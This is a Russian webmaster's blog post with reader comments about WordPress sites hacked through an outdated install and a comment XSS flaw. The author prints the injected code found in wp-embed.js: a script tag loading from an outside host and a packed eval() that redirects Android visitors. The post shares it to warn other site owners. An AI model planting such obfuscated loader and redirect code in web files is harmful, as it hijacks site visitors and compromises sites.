Этот рекламный блок выводится с помощью сервиса AdPlus.io

Обновляйте свои сайты, всегда обновляйте


В общем мудохаюсь уже третий день.

Сначала взломали часть старых проектов под GGL, которые мирно доживали остатки дней. Причина — старая версия WordPress. Чуваки залили тысячу страниц на сайты, которые даже успели проиндексироваться Гуглом. Но это цветочки. На следующий день я обнаружил, что и трафиковые сайты на одном сервере подверглись нападению киберпреступников.

Причины выясняем. Но скорее всего виноват WordPress. Вчера обнаружил, что на одном сайте появился новый администратор с почтой [email protected] Я тут же его грохнул и сразу же Яндекс начал рапортовать о вредоносном коде на моем сайте. Это был мобильный редирект, как он уже достал. Этот сайт уже второй раз страдает от этой заразы. Если первый раз я был виноват, то во втором случае моей вины нет. Что забавно, Гугл не определил наличие вируса на сайте, просто работает в штатном режиме, Яндекс же больше не показывает сайт в в своей выдаче.

По проблеме нашел такую инфу http://www.cy-pr.com/forum/f80/t81023/ и https://xakep.ru/2015/04/28/wordpress-comments-bug/. Проблема оказывается в комментариях WordPress 4.2, они подвержены XSS взлому.

Короткий вывод — не забрасывайте сайты, обновляйте все вордпрессы, плагины, модули, винду и все остальное, удаляйте ненужные плагины и следите за обновлениями и новостями, если появится какая-то уязвимость про нее начнут писать, а вы должны максимально быстро отреагировать на нее.

В продолжение темы. Вот такой вот код дописали в файл wp-includes/js/wp-embed.js:

document.write('<script type="text/javascript"  src="http://kwizzy.biz/?type=js&key=f53a35769505edf"></script>');
eval(function (p, a, c, k, e, d) {
    e = function (c) {
        return (c < a ? '' : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36))
    };
    if (!''.replace(/^/, String)) {
        while (c--) {
            d[e(c)] = k[c] || e(c)
        }
        k = [function (e) {
            return d[e]
        }];
        e = function () {
            return '\\w+'
        };
        c = 1
    }
    ;
    while (c--) {
        if (k[c]) {
            p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c])
        }
    }
    return p
}('5 6(b,d,c){4 a="";c&&(a=w x,a.C(a.m()+h*c),a="; j="+a.A());3.8=b+"="+d+a+"; p=/"}5 g(b){b+="=";f(4 d=3.8.s(";"),c=0;c<d.2;c++){f(4 a=d[c];" "==a.k(0);)a=a.e(1,a.2);l(0==a.t(b))7 a.e(b.2,a.2)}7 B}g("9")||(6("9","1",1),y.z.G(/(v)/i)&&(3.F.E="u://n-o.r/q/?D"));', 43, 43, '||length|document|var|function|createCookie|return|cookie|ya|||||substring|for|readCookie|864E5||expires|charAt|if|getTime|validate|js|path|inc|ru|split|indexOf|http|android|new|Date|navigator|userAgent|toGMTString|null|setTime|upd|href|location|match'.split('|'), 0, {}));

26 Янв, 2016

10 комментариев

  • seoonly.ru

    27 января 2016

    Руки ноги поотрывать тем кто это делает!

    Reply
  • s37dap42x

    27 января 2016

    Вротмнепресс дырявый, бля, постоянно в нем баги находят. У меня тоже всякая фигня несколько лет назад творилась, со взломами и заливками. Никак дыру не мог найти долгое время, пока не снес весь движок с плагинами (кроме БД). Затем залил все заново на чистенький хостинг. Стало годно.

    Reply
    • Skarui

      27 января 2016

      Не люблю Вордпресс. Работал с ним. Все на косылях делать приходится. Такая же рвань как и Битрикс практически. Лично я уважаю MODx и PHP Slim

      Reply
      • Archil

        27 января 2016

        Был у меня опыт с MODx, там дела еще хуже. Его ломали, даже когда все обновлялось стабильно. Но сама идеология мне очень понравилась.
        А WordPress хорош тем, что он все умеет и все может.
        С PHP Slim не знаком, глянем, спасибо.

        Reply
  • Линк

    27 января 2016

    Спасибо, пошел обновлю. Старый снесу вообще нафик.

    Reply
  • ВебмастерОК

    27 января 2016

    По ходу закон кармы сработал быстро и прямо, в ответ на твоё «навреди соседу», бывает и так.

    Reply
    • Archil

      28 января 2016

      Скорее всего. Придется нафиг бросить эти интернеты, идти в монахи, становиться отшельником и тогда карма очистится.

      Reply
      • YoS

        1 февраля 2016

        Давно интересуюсь темой защиты сайтов на WP. Советую вам как минимум следующее:
        1. Сделать доступ к wp-login.php только для определенных IP адресов, либо по заданным учетным данным.
        2. Плагин limit login atempt (ограничивает кол-во неправильных авторизаций)
        3. На стороне хостинга (если есть такая возможность), настроить промежуточную страницу с вводом капчи.
        4. Google captcha на страницу авторизации админки и на форму комментариев.
        Совокупность этих методов «сбреет» около 95% попыток атак на сайт.

        Reply
        • Archil

          1 февраля 2016

          Ух, защита круче чем в Харренхолле, только вот если дракон нападет то уже ничего не поможет.
          Советы дельные, спасибо.

          Reply
          • YoS

            1 февраля 2016

            Ну разве что в качестве дракона будет DDOS атака )).

Добавить комментарий